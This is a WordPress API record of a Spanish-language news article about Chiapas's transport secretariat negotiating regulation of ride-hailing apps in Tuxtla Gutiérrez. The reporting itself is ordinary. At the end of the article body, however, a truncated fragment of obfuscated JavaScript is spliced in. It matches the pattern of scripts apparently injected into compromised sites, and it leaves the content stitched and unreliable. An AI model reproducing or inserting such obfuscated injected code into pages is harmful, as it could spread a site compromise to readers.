{"id":24484,"date":"2025-10-11T02:03:01","date_gmt":"2025-10-11T02:03:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24484"},"modified":"2025-10-11T02:03:02","modified_gmt":"2025-10-11T02:03:02","slug":"avanzan-negociaciones-para-regular-plataformas-de-transporte-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24484","title":{"rendered":"Avanzan negociaciones para regular plataformas de transporte en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000375803-1024x576.jpg\" alt=\"\" class=\"wp-image-24485\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000375803-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000375803-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000375803-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000375803-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000375803.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>10 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Se llev\u00f3 a cabo un encuentro con representantes de conductores por plataformas digitales, en donde la Secretar\u00eda de Movilidad y Transporte (SMyT) del estado de Chiapas, liderada por Albania Gonz\u00e1lez P\u00f3lito, confirm\u00f3 que se encuentra en proceso la regularizaci\u00f3n del servicio de transporte privado con chofer a trav\u00e9s de aplicaciones.<br>Durante la reuni\u00f3n, la titular de la SMyT subray\u00f3 que no existe ninguna oposici\u00f3n por parte del gobierno estatal hacia la operaci\u00f3n de este modelo de transporte.<br>No obstante, recalc\u00f3 que su funcionamiento debe enmarcarse en la ley, con el objetivo fundamental de proteger a los usuarios y alinear el servicio con las estrategias de seguridad del gobernador Eduardo Ram\u00edrez Aguilar.<br>El marco legal para esta regulaci\u00f3n fue establecido con las reformas publicadas en el Peri\u00f3dico Oficial del Estado el pasado 18 de junio, las cuales modifican la Ley de Movilidad y Transporte de Chiapas para incluir y normar espec\u00edficamente esta actividad.<br>Gonz\u00e1lez P\u00f3lito reiter\u00f3 la disposici\u00f3n del Gobierno del Estado por mantener un di\u00e1logo \u201cabierto, respetuoso y constructivo\u201d. Sin embargo, fue enf\u00e1tica al se\u00f1alar que este proceso debe desarrollarse en condiciones de legalidad y orden.<\/p>\n\n\n\n<p>\u201cNo hay ning\u00fan motivo para que cierren vialidades; nosotros no estamos en contra de los conductores. Lo que estamos solicitando es que la plataforma se registre y nos proporcione la informaci\u00f3n requerida\u201d, expres\u00f3 la funcionaria.<br>Con esto, la Secretar\u00eda dej\u00f3 claro que no se permitir\u00e1n afectaciones a la ciudadan\u00eda, como el cierre de calles, como m\u00e9todo de presi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.10 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Se llev\u00f3 a cabo un encuentro con representantes de conductores por plataformas digitales, en donde la Secretar\u00eda de Movilidad y Transporte (SMyT) del estado de Chiapas, liderada por Albania Gonz\u00e1lez P\u00f3lito, confirm\u00f3 que se encuentra en proceso la regularizaci\u00f3n del servicio de transporte privado con chofer a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24485,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24484","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24484"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24484\/revisions"}],"predecessor-version":[{"id":24486,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24484\/revisions\/24486"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24485"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24484"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24484"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24484"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}